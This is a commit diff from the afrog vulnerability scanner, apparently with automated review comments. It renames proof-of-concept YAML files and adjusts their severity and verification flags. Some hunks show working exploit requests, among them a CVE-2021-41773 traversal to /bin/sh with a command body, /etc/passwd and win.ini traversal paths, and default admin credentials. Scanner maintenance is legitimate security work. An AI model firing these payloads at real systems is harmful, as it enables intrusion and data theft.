Projects STRLCPY afrog Commits 9f0ebd53
  • ■ ■ ■ ■ ■ ■
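--- a/pocs/afrog-pocs/a-fingerprinting/panel-detect.yaml
+++ b/pocs/afrog-pocs/a-fingerprinting/panel-detect.yaml
@@ -47,6 +47,7 @@
  - '"panabit-ixcache" != "" && response.status == 200 && response.body.bcontains(b"<title>iXCache</title>")'
  - '"panabit-gateway" != "" && response.status == 200 && response.body.bcontains(b"<span>Powered by OFBiz</span>")'
  - '"rabbitmq-dashboard" != "" && response.status == 200 && response.body.bcontains(b"<title>RabbitMQ Management</title>")'
+ - '"cobbler-webgui" != "" && response.status == 200 && response.body.bcontains(b"<title>Cobbler Web Interface</title>")'
 
  r1:
  request:
@@ -89,5 +90,6 @@
  - '"panabit-ixcache" != "" && response.status == 200 && response.body.bcontains(b"<title>iXCache</title>")'
  - '"panabit-gateway" != "" && response.status == 200 && response.body.bcontains(b"<span>Powered by OFBiz</span>")'
  - '"rabbitmq-dashboard" != "" && response.status == 200 && response.body.bcontains(b"<title>RabbitMQ Management</title>")'
+ - '"cobbler-webgui" != "" && response.status == 200 && response.body.bcontains(b"<title>Cobbler Web Interface</title>")'
 
 expression: r0() || r1()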
  • ■ ■ ■ ■ ■ ■
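--- a/pocs/afrog-pocs/c-unauthorized/nifi-api-unauthorized-access.yaml
+++ b/pocs/afrog-pocs/c-unauthorized/nifi-api-unauthorized-access.yaml
@@ -5,6 +5,9 @@
  author: wulalalaaa(https://github.com/wulalalaaa)
  severity: high
  verified: false
+ description: Apache NiFi Api未授权访问导致命令执行
+ reference:
+ - https://nifi.apache.org/docs/nifi-docs/rest-api/index.html
 
 rules:
  r0: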
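Review bot: The added description on new line 8 states that the unauthenticated API access leads to command execution (`导致命令执行`), but the rule body is in the skipped lines below and cannot be checked against that claim here. If it matches the duplicate removed in this commit (apache-nifi-api-unauthorized-access.yaml), the check only confirms that `/nifi-api/flow/current-user` answers with an anonymous identity. With `verified: false`, a description limited to what the rule establishes, for example `description: Apache NiFi API 未授权访问(匿名身份可访问 REST API)`, would make a hit easier to triage.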
  • ■ ■ ■ ■ ■ ■
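--- a/pocs/afrog-pocs/e-vulnerability/360tianqing-gettablessize-databaseinformationleakage.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/360tianqing-gettablessize-database-info-leakage.yaml
@@ -1,10 +1,11 @@
-id: 360tianqing-gettablessize-databaseinformationleakage
+id: 360tianqing-gettablessize-database-info-leakage
 
 info:
  name: 360天擎 gettablessize 数据库信息泄露漏洞
- author: daffainfo
- severity: critical
- description: 360天擎 存在未授权越权访问,造成敏感信息泄露 title="360新天擎"
+ author: daffainfo,
+ severity: medium
+ verified: true
+ description: 360天擎 存在未授权越权访问,造成敏感信息泄露 title="360新天擎" app="360天擎终端安全管理系统"
  reference:
  - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/360%E5%A4%A9%E6%93%8E%20gettablessize%20%E6%95%B0%E6%8D%AE%E5%BA%93%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
 
@@ -13,5 +14,5 @@
  request:
  method: GET
  path: /api/dbstat/gettablessize
- expression: response.status == 200 && response.body.bcontains(b'"schema_name":') && response.body.bcontains(b'"reason":')
+ expression: response.status == 200 && response.body.bcontains(b'"schema_name":') && response.body.bcontains(b'"reason":') && response.body.bcontains(b'"table_name":')
 expression: r0()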
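Review bot: The new line 5 reads `author: daffainfo,` with a trailing comma, so the author value becomes the string `daffainfo,` in any report or listing that prints it. If a single author is meant, keep `author: daffainfo`; if a second name was intended after the comma, it is missing. The description on new line 8 also appends two search fingerprints (`title=...` and `app=...`) to the prose, which a short comment line or a separate field would keep apart from the human-readable summary.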
  • ■ ■ ■ ■ ■ ■
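--- a/pocs/afrog-pocs/e-vulnerability/74cms-ajax-personal-controller-class-php-sqlinject.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/74cms-ajax-personal-controller-class-php-sqlinject.yaml
@@ -1,10 +1,11 @@
 id: 74cms-ajax-personal-controller-class-php-sqlinject
 
 info:
- name: 74cms 5.0.1 SQL注入漏洞
+ name: 74 CMS 5.0.1 SQL 注入漏洞
  author: jinqi
- severity: critical
- description: 74cms 5.0.1 前台AjaxPersonalController.class.php存在SQL注入漏洞
+ severity: high
+ verified: false
+ description: 74cms 5.0.1 前台AjaxPersonalController.class.php存在SQL注入漏洞 app="骑士-74CMS"
  reference:
  - https://www.cnblogs.com/TJWater/p/14780067.html
 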
  • ■ ■ ■ ■ ■ ■
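--- a/pocs/afrog-pocs/e-vulnerability/74cms-sqli-1.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/74cms-sqli-1.yaml
@@ -1,10 +1,11 @@
 id: 74cms-sqli-1
 
 info:
- name: 74cms-sqli-1
+ name: 74 CMS SQL 注入漏洞
  author: betta
- severity: critical
- description: 74cms-sqli-1
+ severity: high
+ verified: true
+ description: 74cms-sqli-1 app="骑士-74CMS"
  reference:
  - https://www.uedbox.com/post/29340
 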
  • ■ ■ ■ ■ ■ ■
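--- a/pocs/afrog-pocs/e-vulnerability/74cms-sqli-2.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/74cms-sqli-2.yaml
@@ -1,10 +1,11 @@
 id: 74cms-sqli-2
 
 info:
- name: 74cms-sqli-2
+ name: 74 CMS SQL 注入漏洞
  author: rexus
- severity: critical
- description: 74cms-sqli-2
+ severity: high
+ verified: true
+ description: 74cms-sqli-2 app="骑士-74CMS"
  reference:
  - https://www.uedbox.com/post/30019/
 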
  • ■ ■ ■ ■ ■
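--- a/pocs/afrog-pocs/e-vulnerability/acti-video-read-file.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/acti-video-read-file.yaml
@@ -4,6 +4,7 @@
  name: ACTI 视频监控 images 任意文件读取漏洞
  author: zan8in
  severity: high
+ verified: true
  description: |
  ACTI 视频监控 存在任意文件读取漏洞
  app="ACTi-视频监控"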
  • ■ ■ ■ ■ ■
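--- a/pocs/afrog-pocs/e-vulnerability/alibaba-canal-config-leak.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/alibaba-canal-config-leak.yaml
@@ -3,7 +3,8 @@
 info:
  name: Alibaba Canal config 云密钥信息泄露漏洞
  author: zan8in
- severity: critical
+ severity: high
+ verified: true
  description: |
  由于/api/v1/canal/config 未进行权限验证可直接访问,导致账户密码、accessKey、secretKey等一系列敏感信息泄露
  title="Canal Admin"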
  • ■ ■ ■ ■ ■
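--- a/pocs/afrog-pocs/e-vulnerability/amtt-hiboss-server-ping-rce.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/amtt-hiboss-server-ping-rce.yaml
@@ -4,6 +4,7 @@
  name: Amtt hiboss Server Ping RCE
  author: YekkoY
  severity: high
+ verified: false
 
 set:
  r2: randomLowercase(10)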
  • ■ ■ ■ ■ ■ ■
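--- a/pocs/afrog-pocs/e-vulnerability/anyproxy-directory-traversal.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/anyproxy-directory-traversal.yaml
@@ -1,20 +0,0 @@
-id: anyproxy-directory-traveral
-
-info:
- name: Anyproxy 目录穿越导致任意文件读取
- author: zan8in
- severity: critical
- description: |
- Alibaba AnyProxy 低版本存在任意文件读取,通过漏洞,攻击者可以获取服务器敏感信息
- fofa: Anyproxy
- reference:
- - https://github.com/alibaba/anyproxy/issues/391
- - http://wiki.peiqi.tech/wiki/webapp/Alibaba%20AnyProxy/Alibaba%20AnyProxy%20fetchBody%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
-
-rules:
- r0:
- request:
- method: GET
- path: /fetchBody?id=1/../../../../../../../../etc/passwd
- expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
-expression: r0()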
  • ■ ■ ■ ■ ■ ■
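--- a/pocs/afrog-pocs/e-vulnerability/apache-ambari-default-password.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/apache-ambari-default-password.yaml
@@ -1,20 +0,0 @@
-id: apache-ambari-default-password
-
-info:
- name: apache-ambari-default-password
- author: wulalalaaa(https://github.com/wulalalaaa)
- severity: critical
- description: apache-ambari-default-password
- reference:
- - https://cwiki.apache.org/confluence/display/AMBARI/Quick+Start+Guide
-
-rules:
- r0:
- request:
- method: GET
- path: /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name
- headers:
- Authorization: Basic YWRtaW46YWRtaW4=
- expression: response.status == 200 && response.body.bcontains(b"PrivilegeInfo") && response.body.bcontains(b"AMBARI.ADMINISTRATOR")
-expression: r0()
-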
  • ■ ■ ■ ■ ■ ■
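--- a/pocs/afrog-pocs/e-vulnerability/apache-httpd-cve-2021-41773-rce.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/apache-httpd-cve-2021-41773-rce.yaml
@@ -1,21 +0,0 @@
-id: apache-httpd-cve-2021-41773-rce
-
-info:
- name: apache-httpd-cve-2021-41773-rce
- author: B1anda0(https://github.com/B1anda0)
- severity: critical
- description: apache-httpd-cve-2021-41773-rce
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2021-41773
-
-set:
- r1: randomInt(800000000, 1000000000)
- r2: randomInt(800000000, 1000000000)
-rules:
- r0:
- request:
- method: POST
- path: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
- body: echo;expr {{r1}} + {{r2}}
- expression: response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
-expression: r0()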
  • ■ ■ ■ ■ ■ ■
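--- a/pocs/afrog-pocs/e-vulnerability/apache-nifi-api-unauthorized-access.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/apache-nifi-api-unauthorized-access.yaml
@@ -1,18 +0,0 @@
-id: apache-nifi-api-unauthorized-access
-
-info:
- name: Apache NiFi Api未授权访问导致命令执行
- author: wulalalaaa(https://github.com/wulalalaaa)
- severity: critical
- description: Apache NiFi Api未授权访问导致命令执行
- reference:
- - https://nifi.apache.org/docs/nifi-docs/rest-api/index.html
-
-rules:
- r0:
- request:
- method: GET
- path: /nifi-api/flow/current-user
- follow_redirects: true
- expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"identity\":\"anonymous\",\"anonymous\":true")
-expression: r0()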
  • ■ ■ ■ ■ ■
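--- a/pocs/afrog-pocs/e-vulnerability/AspCMS-commentList.asp-SQL.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/aspcms-commentlist-sql-injection.yaml
@@ -1,9 +1,10 @@
-id: AspCMS-commentList.asp-SQL
+id: aspcms-commentlist-sql-injection
 
 info:
  name: AspCMS commentList.asp SQL注入漏洞
  author: daffainfo
- severity: critical
+ severity: high
+ verified: false
  description: AspCMS commentList.asp 存在SQL注入漏洞,攻击者通过漏洞可以获取管理员md5的密码 app="ASPCMS"
  reference:
  - https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/AspCMS%20commentList.asp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md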
  • ■ ■ ■ ■ ■ ■
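--- a/pocs/afrog-pocs/e-vulnerability/AVCON6-download.action-Downloadanyfile.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/avcon6-download.action-download-file-read.yaml
@@ -1,9 +1,10 @@
-id: AVCON6-download.action-Downloadanyfile
+id: avcon6-download.action-download-file-read
 
 info:
  name: AVCON6 系统管理平台 download.action 任意文件下载漏洞
  author: daffainfo
- severity: critical
+ severity: high
+ verified: false
  description: AVCON6 系统管理平台 download.action 存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器任意文件 app="AVCON-6"
  reference:
  - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/AVCON6%20%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20download.action%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.md
@@ -18,5 +19,5 @@
  request:
  method: GET
  path: /download.action?filename=../../../../../../Windows/win.ini
- expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")
+ expression: response.status == 200 && response.body.bcontains(b"bit app support") && response.body.bcontains(b"fonts") && response.body.bcontains(b"extensions")
 expression: linux0() || windows0()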
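Review bot: The Windows check on new line 22 now matches the bare words `fonts` and `extensions`, which also occur in ordinary HTML and CSS, so a 200 landing or error page that happens to contain `bit app support` could still be reported. Matching the section headers as they appear in win.ini keeps the check specific: `response.body.bcontains(b"[fonts]") && response.body.bcontains(b"[extensions]")`. The same expression is added in avcon6-org-execl-file-download.yaml and would take the same change. The renamed id `avcon6-download.action-download-file-read` also keeps a dot, while the other ids renamed in this commit drop them. The start of this rule and the linux0 rule are in the skipped lines.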
  • ■ ■ ■ ■ ■ ■
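--- a/pocs/afrog-pocs/e-vulnerability/AVCON6-org_execl_download.action-Downloadanyfile.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/avcon6-org-execl-file-download.yaml
@@ -1,9 +1,10 @@
-id: AVCON6-org_execl_download.action-Downloadanyfile
+id: avcon6-org-execl-file-download
 
 info:
  name: AVCON6 系统管理平台 org_execl_download.action 任意文件下载漏洞
  author: daffainfo
- severity: critical
+ severity: high
+ verified: false
  description: AVCON6 系统管理平台 org_execl_download.action存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器任意文件 app="AVCON-6"
  reference:
  - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/AVCON6%20%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20org_execl_download.action%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.md
@@ -18,5 +19,5 @@
  request:
  method: GET
  path: /org_execl_download.action?filename=../../../../../../../../../../../../../Windows/win.ini
- expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")
+ expression: response.status == 200 && response.body.bcontains(b"bit app support") && response.body.bcontains(b"fonts") && response.body.bcontains(b"extensions")
 expression: linux0() || windows0()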
  • ■ ■ ■ ■ ■
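--- a/pocs/afrog-pocs/e-vulnerability/bohuangwanglong-cmd-php-rce.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/bohuangwanglong-cmd-php-rce.yaml
@@ -4,6 +4,7 @@
  name: 博华网龙防火墙 cmd.php 远程命令执行漏洞(OEM)
  author: zan8in
  severity: critical
+ verified: true
  description: |
  博华网龙防火墙 cmd.php 过滤不足,导致命令拼接执行远程命令
  "博华网龙防火墙"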
  • ■ ■ ■ ■ ■
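--- a/pocs/afrog-pocs/e-vulnerability/bohuawanglong-users-xml-password-leak.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/bohuawanglong-users-xml-password-leak.yaml
@@ -4,6 +4,7 @@
  name: 博华网龙防火墙 users.xml 未授权访问
  author: zan8in
  severity: high
+ verified: true
  description: |
  博华网龙防火墙 users.xml文件 可被任意用户读取,其中包含登录的账号密码
  "博华网龙防火墙"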
  • ■ ■ ■ ■ ■
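--- a/pocs/afrog-pocs/e-vulnerability/BSPHP-index.php-Unauthorized-access.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/bsphp-nauthorized-access.yaml
@@ -1,9 +1,10 @@
-id: BSPHP-index.php-Unauthorized-access
+id: bsphp-nauthorized-access
 
 info:
  name: BSPHP index.php 未授权访问信息泄露漏洞
  author: daffainfo
  severity: medium
+ verified: true
  description: |
  BSPHP 存在未授权访问 泄露用户IP和账户名信息
  fofa-query: "BSPHP"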
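Review bot: The new id on line 1, `bsphp-nauthorized-access`, and the renamed file drop the `u` of `unauthorized`, so the POC will be missed by anyone searching or filtering the set for `unauthorized`. Suggest `id: bsphp-unauthorized-access`, with the file renamed to match.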
  • ■ ■ ■ ■ ■
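--- a/pocs/afrog-pocs/e-vulnerability/byzoro-smart-importhtml-rce.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/byzoro-smart-importhtml-rce.yaml
@@ -1,9 +1,10 @@
-id: byzoro-smart-importhtml-rce.yaml
+id: byzoro-smart-importhtml-rce
 
 info:
  name: 百卓 Smart importhtml.php 远程命令执行漏洞
  author: zan8in
  severity: critical
+ verified: true
  description: |
  百卓 importhtml.php文件sql语句无过滤,通过Sql语句可远程命令执行
  title="Smart管理平台"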
  • ■ ■ ■ ■ ■
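--- a/pocs/afrog-pocs/e-vulnerability/cacti-weathermap-file-write.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/cacti-weathermap-file-write.yaml
@@ -4,6 +4,7 @@
  name: Cacti Weathermap File Write
  author: whynot(https://github.com/notwhy)
  severity: high
+ verified: true
 
 rules:
  r0: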
  • ■ ■ ■ ■ ■
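--- a/pocs/afrog-pocs/e-vulnerability/chinaunicom-modem-default-password.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/chinaunicom-modem-default-password.yaml
@@ -3,8 +3,9 @@
 info:
  name: 中国联通 modem 默认密码
  author: daffainfo
- severity: critical
- description: 中国联通 modem默认密码
+ severity: high
+ verified: false
+ description: 中国联通 modem 默认密码
 
 rules:
  r0: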
  • ■ ■ ■ ■ ■
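--- a/pocs/afrog-pocs/e-vulnerability/clickhouse-api-unauth.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/clickhouse-api-unauth.yaml
@@ -4,6 +4,7 @@
  name: ClickHouse API 数据库接口未授权访问漏洞 8123端口
  author: zan8in
  severity: high
+ verified: false
  description: |
  ClickHouse API 数据库接口存在未授权访问漏洞,攻击者通过漏洞可以执行任意SQL命令获取数据库数据
  ClickHouse 8123端口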
  • ■ ■ ■ ■ ■ ■
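--- a/pocs/afrog-pocs/e-vulnerability/CmsEasy-crossall_act.php-SQL.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/cmseasy-crossall-act-php-sql-injection.yaml
@@ -1,15 +1,14 @@
-id: CmsEasy-crossall_act.php-SQL
+id: cmseasy-crossall-act-php-sql-injection
 
 info:
  name: CmsEasy crossall_act.php SQL注入漏洞
  author: daffainfo
- severity: critical
+ severity: high
+ verified: true
  description: CmsEasy 存在SQL注入漏洞,通过文件 service.php 加密SQL语句执行即可执行任意SQL命令。影响版本:CmsEasy V7.7.5_20210919 body="cmseasyedit"
  reference:
  - https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/CmsEasy%20crossall_act.php%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
 
-set:
- hosturl: request.url
 rules:
  r0:
  request: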
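Review bot: The `set:` block that defined `hosturl` (old lines 11-12) is removed, but the request and expression of `r0` sit in the skipped lines below and cannot be checked here. If either still refers to `hosturl`, the rule would presumably fail to evaluate and the POC would stop matching without any visible error, which is easy to miss on a file marked `verified: true`. Worth confirming that no reference to the variable remains before merging.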
  • ■ ■ ■ ■ ■
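--- a/pocs/afrog-pocs/e-vulnerability/cobbler-default-login.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/cobbler-default-login.yaml
@@ -4,7 +4,8 @@
  name: Cobbler Default Login
  author: c-sh0
  severity: high
- description: Cobbler default login credentials for the testing module (testing/testing) were discovered.
+ verified: true
+ description: Cobbler default login credentials for the testing module (testing/testing) were discovered. fofa "Cobbler"
  reference:
  - https://seclists.org/oss-sec/2022/q1/146
  - https://github.com/cobbler/cobbler/issues/2307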
  • ■ ■ ■ ■ ■
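--- a/pocs/afrog-pocs/e-vulnerability/cobbler-exposed-directory.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/cobbler-exposed-directory.yaml
@@ -4,6 +4,7 @@
  name: Exposed Cobbler Directories
  author: c-sh0
  severity: medium
+ verified: false
  description: Searches for exposed Cobbler Directories
 
 rules: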
  • ■ ■ ■ ■ ■
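--- a/pocs/afrog-pocs/e-vulnerability/cobbler-webgui.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/cobbler-webgui.yaml
@@ -4,6 +4,7 @@
  name: Cobbler WebGUI Detection
  author: c-sh0
  severity: info
+ verified: true
  description: |
  Detection of Cobbler WebGUI
  shodan-query: http.title:"Cobbler Web Interface"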
  • ■ ■ ■ ■ ■
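--- a/pocs/afrog-pocs/e-vulnerability/consul-rexec-rce.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/consul-rexec-rce.yaml
@@ -4,6 +4,7 @@
  name: Consul rexec RCE
  author: imlonghao(https://imlonghao.com/)
  severity: high
+ verified: false
 
 rules:
  r0: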
  • ■ ■ ■ ■ ■
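--- a/pocs/afrog-pocs/e-vulnerability/consul-service-rce.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/consul-service-rce.yaml
@@ -4,6 +4,7 @@
  name: Consul Service RCE
  author: imlonghao(https://imlonghao.com/)
  severity: high
+ verified: false
 
 rules:
  r0: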
  • ■ ■ ■ ■ ■
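--- a/pocs/afrog-pocs/e-vulnerability/couchdb-adminparty.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/couchdb-admin-party.yaml
@@ -1,9 +1,10 @@
-id: couchdb-adminparty
+id: couchdb-admin-party
 
 info:
  name: CouchDB Admin Party
  author: organiccrap
  severity: high
+ verified: false
  description: Requests made against CouchDB are done in the context of an admin user.
 
 rules: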
  • ■ ■ ■ ■ ■
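--- a/pocs/afrog-pocs/e-vulnerability/CxCMS-Resource.ashx-Arbitrary-File-Read-Vulnerability.yaml
+++ b/pocs/afrog-pocs/e-vulnerability/cxcms-arbitrary-file-read.yaml
@@ -1,9 +1,10 @@
-id: CxCMS-Resource.ashx-Arbitrary-File-Read-Vulnerability
+id: cxcms-arbitrary-file-read
 
 info:
  name: CxCMS Resource.ashx 任意文件读取漏洞
  author: daffainfo
- severity: critical
+ severity: high
+ verified: true
  description: |
  CxCMS存在任意文件读取,由于/Sys/Handler/Resource.ashx页面 _FilePath参数过滤不严,导致可以读取系统敏感文件。
  fofa-query: "Powered by CxCms"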
  • ■ ■ ■ ■ ■
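--- a/pocs/afrog-pocs/f-CNVD/2018/CNVD-2018-16876.yaml
+++ b/pocs/afrog-pocs/f-CNVD/2018/CNVD-2018-16876.yaml
@@ -3,7 +3,8 @@
 info:
  name: Cobbler任意文件读取漏洞
  author: rain
- severity: medium
+ severity: high
+ verified: false
  description: |
  Cobbler是一款网络安装服务器套件,它能够快速建立Linux网络安装环境。
  Cobbler 2.6.11-1版本中存在任意文件读取漏洞。攻击者可利用该漏洞读取任意文件。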
  • ■ ■ ■ ■ ■ ■
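--- a/pocs/afrog-pocs/f-CNVD/2020/CNVD-2020-62853.yaml
+++ b/pocs/afrog-pocs/f-CNVD/2020/CNVD-2020-62853.yaml
@@ -1,20 +0,0 @@
-id: CNVD-2020-62853
-
-info:
- name: 360 天擎终端安全管理系统越权访问漏洞
- author: 你是猪
- severity: medium
- description: |
- FOFA:app="360天擎终端安全管理系统"
- reference:
- - https://blog.51cto.com/u_9691128/4295047
-
-rules:
- r0:
- request:
- method: GET
- path: /api/dbstat/gettablessize
- expression: response.status == 200 && response.body.bcontains(b'"schema_name":')&& response.body.bcontains(b'"table_name":')
-expression: r0()
-
-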